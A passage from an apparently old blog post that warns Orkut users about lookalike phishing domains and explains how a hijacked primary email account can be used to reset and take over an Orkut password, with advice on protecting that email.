    www.community-orkut.com
    www.orkut-login.com
    while the original Orkut domain is www.orkut.com


6. Primary email address hack
If orkut hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this orkut hacker can easily hack your orkut account using "Forgot password" trick. He will simply ask orkut to send password reset email to your primary email address- which is already hacked. Thus, your orkut account password will be reset and orkut account hacked !!!


So, always remember to protect your orkut primary email address and try to keep unknown or useless mail id as your primary email address


Technorati Tags: , , , , ,